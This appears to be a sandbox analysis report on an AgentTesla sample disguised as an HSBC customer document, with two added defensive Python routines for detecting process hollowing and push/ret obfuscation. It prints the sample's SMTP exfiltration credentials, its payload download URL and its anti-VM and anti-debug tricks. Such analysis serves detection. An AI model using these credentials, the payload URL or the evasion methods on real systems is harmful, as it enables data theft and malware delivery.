Source: HSBC Customer Information.exe.6392.0.memstrmin |
Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"} (the SMTP Info value is the exfiltration account, its password, the SMTP server and the recipient address run together without separators: the account is gmx@qrextechnologies.com, the recipient is info@qrextechnologies.com, the server is a host under qrextechnologies.com, and the exact boundary between password and server name is not preserved) |
Source: HSBC Customer Information.exe |
Virustotal: Detection: 25% |
Source: HSBC Customer Information.exe |
ReversingLabs: Detection: 20% |
Source: HSBC Customer Information.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: global traffic |
HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: qrextechnologies.com
Cache-Control: no-cache |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49791 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49791 -> 443 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://127.0.0.1:HTTP/1.1 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://DynDns.comDynDNS |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: http://cthUYD.com |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: https://api.ipify.org%GETMozilla/5.0 |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 |
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp |
String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_004017AC |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224282A |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022428A3 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02245CAF |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022406C3 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240ED2 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240F34 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240702 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224651E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 25_2_1DD747A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Code function: 25_2_1DD74790 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process Stats: CPU usage > 98% |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process Stats: CPU usage > 98% |
Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe |
Source: HSBC Customer Information.exe |
Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe |
Source: HSBC Customer Information.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: HSBC Customer Information.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' |
|
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
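The process tree above shows RegAsm.exe, a signed .NET framework utility, created by "HSBC Customer Information.exe" with the parent's own path as its command line, which is the trace a loader leaves when it starts RegAsm.exe suspended and replaces its image with the payload (the Yara hits in RegAsm.exe memory below are consistent with that). The following is an added example, not code from the sample, the sandbox or the report: a small triage routine over process-creation records that flags a .NET host whose command line names a different executable. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the event records are constructed, only the first and third reproduce lines from this report, and the list of host binaries is an assumption.

```python
# Added example, not part of the sandbox report: triage process-creation
# records for a .NET framework utility started with a command line that
# names a different executable (process-hollowing trace). Field names follow
# Sysmon Event ID 1; the events are constructed and DOTNET_HOSTS is assumed.
import ntpath
from typing import Dict, List

# .NET framework utilities commonly used as hollowing hosts (assumed list)
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
                "aspnet_compiler.exe", "applaunch.exe"}
# Path fragments (lower case) that mark user-writable locations
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def first_executable(cmdline: str) -> str:
    """Executable named by a Windows command line: a quoted first argument
    (double quotes on Windows, single quotes in the sandbox rendering) or
    the text up to the first space."""
    s = cmdline.strip()
    if s and s[0] in "\"'":
        end = s.find(s[0], 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def hollowing_reasons(ev: Dict[str, str]) -> List[str]:
    """Reasons to suspect the event; empty list means nothing stood out."""
    reasons: List[str] = []
    image = ntpath.basename(ev["Image"]).lower()
    if image not in DOTNET_HOSTS:
        return reasons
    claimed = ntpath.basename(first_executable(ev["CommandLine"])).lower()
    if claimed != image:
        reasons.append(f"command line names {claimed}, image is {image}")
    parent = ev.get("ParentImage", "").lower()
    if any(fragment in parent for fragment in USER_WRITABLE):
        reasons.append("parent runs from a user-writable path")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    hits = []
    for ev in events:
        reasons = hollowing_reasons(ev)
        if reasons:
            hits.append({"Image": ev["Image"],
                         "ParentImage": ev.get("ParentImage", ""),
                         "reasons": reasons})
    return hits


# Constructed records; the first and third mirror the report's process tree
EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"'C:\Users\user\Desktop\HSBC Customer Information.exe'",
     "ParentImage": r"C:\Users\user\Desktop\HSBC Customer Information.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /codebase Example.dll',
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe"},
    {"Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe build.proj",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["Image"], "<-", hit["ParentImage"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

Only the first record is flagged, for both reasons; the legitimate RegAsm.exe invocation from Visual Studio and the MSBuild.exe run pass because their command lines name the image itself. The command-line mismatch is the stronger signal; the user-writable-parent check alone would fire on ordinary developer tooling.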
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: classification engine |
Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01 |
Source: Yara match |
File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_00407D36 push 0000000Fh; ret (ret at 0_2_00407D56) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_004059AE push ecx; ret (ret at 0_2_004059AF) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02241E3C push esp; ret (ret at 0_2_02241E9D) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224460E push ebp; iretd (iretd at 0_2_022446A9) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02244412 push esp; retf (retf at 0_2_02244413) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_0224301F push ebx; iretd (iretd at 0_2_02243026) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02240A5C push esi; retf (retf at 0_2_02240A5D) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022446B5 push ebp; iretd (iretd at 0_2_022446A9) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02242D18 push ebx; iretd (iretd at 0_2_02242D52) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02246B6D push ecx; retf (retf at 0_2_02246B6E) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022441BE push ebx; iretd (iretd at 0_2_0224435E) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02241F89 push 0000001Dh; ret (ret at 0_2_02241F8B) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_02244192 push ebx; iretd (iretd at 0_2_0224435E) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022467E2 pushad; retf (retf at 0_2_022467F1) |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Code function: 0_2_022445F1 push ebp; iretd (iretd at 0_2_022446A9) |
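The push/ret, push/retf, push/iretd and pushad/retf pairs listed above are the obfuscated-control-flow pattern the sandbox flags: the return address is pushed by hand and consumed by a return instruction, so a static disassembler following calls and jumps loses the real flow. As an added example (not code from the sample, the sandbox or this report), the scanner below finds such pairs in raw x86 code bytes and prints them in the report's own "<run>_<push address> gadget <run>_<return address>" style. It matches only immediately adjacent instruction pairs, whereas several of the report's hits have other instructions between the push and the return (compare 0_2_00407D36 with its ret at 0_2_00407D56), and byte scanning can hit data or immediate operands; the input bytes are constructed, not taken from the sample.

```python
# Added example, not code from the sample or the sandbox report: scan raw
# x86 code bytes for "push <reg|imm8>; ret/retf/iretd" and "pushad; retf"
# pairs and render them the way the report lists them. Adjacent pairs only.
from typing import List, Tuple

# One-byte push encodings: 0x50+r for eax..edi, 0x60 for pushad
_PUSH_ONE_BYTE = {0x50 + i: f"push {r}" for i, r in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
_PUSH_ONE_BYTE[0x60] = "pushad"
_PUSH_IMM8 = 0x6A                                   # push imm8 (sign-extended)
# Transfers that consume the pushed value as a return address
_RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str, int]]:
    """Return (push_address, 'push x; ret', return_address) for each pair."""
    hits: List[Tuple[int, str, int]] = []
    i = 0
    while i < len(code):
        op = code[i]
        if op in _PUSH_ONE_BYTE and i + 1 < len(code) and code[i + 1] in _RETURNS:
            hits.append((base + i,
                         f"{_PUSH_ONE_BYTE[op]}; {_RETURNS[code[i + 1]]}",
                         base + i + 1))
            i += 2
        elif op == _PUSH_IMM8 and i + 2 < len(code) and code[i + 2] in _RETURNS:
            imm = code[i + 1]
            # sign-extend imm8 to 32 bits, as the report prints 0000000Fh
            imm32 = (imm - 0x100 if imm >= 0x80 else imm) & 0xFFFFFFFF
            hits.append((base + i,
                         f"push {imm32:08X}h; {_RETURNS[code[i + 2]]}",
                         base + i + 2))
            i += 3
        else:
            i += 1
    return hits


def format_hits(hits: List[Tuple[int, str, int]], run: str = "0_2") -> List[str]:
    """Report style: '0_2_00407D36 push 0000000Fh; ret 0_2_00407D56'."""
    return [f"{run}_{push:08X} {gadget} {run}_{ret:08X}" for push, gadget, ret in hits]


# Constructed bytes (not taken from the sample): two nops, then five pairs
SAMPLE = bytes.fromhex(
    "90 90 6A 0F C3"   # nop; nop; push 0Fh; ret
    "33 C0 51 C3"      # xor eax, eax; push ecx; ret
    "55 CF"            # push ebp; iretd
    "54 CB"            # push esp; retf
    "60 CB"            # pushad; retf
    "C3"               # lone ret, not a pair
)

if __name__ == "__main__":
    for line in format_hits(find_push_ret(SAMPLE, base=0x00407D00)):
        print(line)
```

Run as a script it lists the five pairs with addresses relative to the assumed base 0x00407D00. To cover the non-adjacent cases the report shows, the same table of opcodes would be fed a real disassembler's instruction stream rather than raw bytes, looking for a push whose value is next consumed by a return within the same basic block.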
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX (48 occurrences) |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions:
0x00000000 rdtsc
0x00000002 cmp edx, 000000F3h
0x00000008 xor eax, edx
0x0000000a cmp cx, 00E8h
0x0000000f dec edi
0x00000010 cmp bx, 00DDh
0x00000015 fabs
0x00000017 jmp 00007FC36C4BB470h
0x00000019 cmp edi, 00000000h
0x0000001c jne 00007FC36C4BB393h
0x00000022 cmp si, 00BBh
0x00000027 mov ebx, F06F76B6h
0x0000002c cmp dh, FFFFFFACh
0x0000002f sub ebx, 2716C148h
0x00000035 cmp ebx, 24h
0x00000038 xor ebx, 6F5BB001h
0x0000003e cmp di, 0030h
0x00000042 punpckldq mm1, mm7
0x00000045 jmp 00007FC36C4BB474h
0x00000047 xor ebx, A643056Fh
0x0000004d cmp ah, 00000026h
0x00000050 cmp cl, FFFFFF90h
0x00000053 rdtsc |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Window / User API: threadDelayed 684 |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Window / User API: threadDelayed 9316 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Window / User API: threadDelayed 9139 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Window / User API: threadDelayed 685 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll |
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\HSBC Customer Information.exe |
Thread information set: HideFromDebugger |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Thread information set: HideFromDebugger |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Thread information set: HideFromDebugger |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Program Manager |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Progman |
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp |
Binary or memory string: Progmanlock |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (3 occurrences) |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Source: Yara match |
File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR |